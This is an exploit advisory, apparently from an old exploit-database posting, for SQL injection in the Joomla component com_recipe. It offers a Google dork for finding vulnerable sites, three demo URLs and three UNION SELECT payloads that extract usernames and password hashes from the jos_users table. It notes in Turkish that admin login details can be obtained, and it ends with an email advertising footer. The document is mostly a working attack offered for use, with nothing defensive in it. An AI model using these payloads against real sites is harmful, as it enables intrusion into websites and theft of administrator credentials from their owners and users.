########################################################################

#       
 Joomla Component com_recipe SQL Injection 
Vulnerabilities                                     

########################################################################                                                      

#
 Author   :FL0RiX

#   

#Greez: All Tahkikat-ul Ahlak Family

#                                                    

#
 Name     : com_recipe
#
# Google Dork: allinurl:"com_recipe"

#                                                        

#
 Bug Type   : SQL Injection

#                                                        

#
 Infection    : Admin login bilgileri alinabilir.       

#                                                        

#
 Demo Vulns :

#

# 
site.com/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1]
# 
site.com/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2]
# 
site.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3]

#

#
EXPLOIT1 : 
+and+1=0+union+select+concat(username,0x3a,password)+from+jos_users--
#
EXPLOIT2 :+and+1=0+union+select+1,concat(username,0x3a,password),3,4+from+jos_users--
#
EXPLOIT3 :+and+1=0+union+select+user(),concat(username,0x3a,password),user(),user()+from+jos_users--

#############################################################################




 		 	   		   		 	   		   		 	   		  
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarę bulun. Daha fazla bilgi edinin.
http://windows.microsoft.com/shop